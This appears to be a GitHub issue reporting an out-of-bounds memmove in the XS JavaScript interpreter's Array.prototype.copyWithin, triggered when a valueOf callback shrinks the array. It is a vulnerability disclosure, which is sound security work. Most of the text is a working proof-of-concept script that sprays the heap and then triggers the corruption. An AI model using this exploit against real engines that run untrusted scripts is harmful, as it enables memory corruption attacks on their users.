Memory Corruption in Array.prototype.copyWithin

The following JavaScript causes memory corruption in the XS interpreter. This is because  fxArgToIndex is called after the array length is read, even though fxArgToIndex can change the length of an array if a parameter is an object with valueOf defined. This leads to a memmove of out-of-bounds memory. This is a security concern if the engine is allowed to run untrusted scripts.

```var a = [1, 2, 3];

function f(){
	a.length = 10000;
	a.fill(10);
	return a;
}

var t = [];

function n(){

	for(var i = 0; i < 1000; i++){
	var tt = "0123456789012345678901234567890123456789"
	t.push([tt]);	
	}
	return 999;	

}

function m(){

        a.length = 1;

	
	return 500;
}

class MyArray extends Array {
  static get [Symbol.species]() { return f; }
}

var q = a;
q.length = 1000;
q.fill(0x77777777);


q.copyWithin(0, {valueOf : m}, {valueOf : n});

print("hello");
for(var i = 0; i < 20; i++){
	print(i);
	try{
	print(t[i]);
	}catch(e){}
}

print(q.length);

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Memory Corruption in Array.prototype.copyWithin #123

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Memory Corruption in Array.prototype.copyWithin #123

Description

Metadata

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Issue actions